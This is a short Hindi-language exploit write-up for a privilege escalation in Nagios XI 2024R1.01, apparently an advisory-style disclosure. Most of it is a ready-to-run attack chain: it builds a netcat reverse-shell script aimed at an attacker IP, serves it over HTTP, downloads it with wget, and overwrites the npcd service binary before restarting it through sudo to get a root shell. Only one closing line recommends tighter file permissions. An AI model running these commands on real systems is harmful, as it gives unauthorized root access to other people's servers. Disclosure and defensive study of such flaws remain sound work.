
Nagios 2024R1.01 में विशेषाधिकार वृद्धि
CVE द्वारा खोजा गया: Jarod Jaslow (MAWK)
उपयोगकर्ता "NAGIOS" के रूप में, हमलावर मशीन पर निम्नलिखित सामग्री वाली एक फ़ाइल बनाएं:
#!/bin/bash
nc -e /bin/bash <Attacker IP> 4445

हमलावर मशीन पर Python HTTP सर्वर के माध्यम से फ़ाइल होस्ट करें:
python3 -m http.server 8000

हमलावर मशीन पर Netcat (NC) लिसनिंग सर्वर शुरू करें:
nc -nlvp 4445

हमलावर मशीन से फ़ाइल प्राप्त करें:
wget http://<Attacker IP>:8000/npcd

विशेषाधिकार बढ़ाने और रूट के रूप में कनेक्शन प्राप्त करने के लिए निम्नलिखित कमांड निष्पादित करें:
sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
cp npcd /usr/local/nagios/bin/npcd
sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd


यह अनुशंसित है कि उपयोगकर्ता "NAGIOS" की रूट के रूप में चलने वाले Nagios सेवा निष्पादन योग्य फ़ाइलों में लिखने की क्षमता को प्रतिबंधित किया जाए। यह Nagios सेवाओं से संबंधित प्रासंगिक निर्देशिकाओं और फ़ाइलों के लिए सख्त फ़ाइल अनुमतियाँ और पहुँच नियंत्रण लागू करके प्राप्त किया जा सकता है।
नए रिलीज़ में इसे ठीक किया जाना चाहिए
CVE: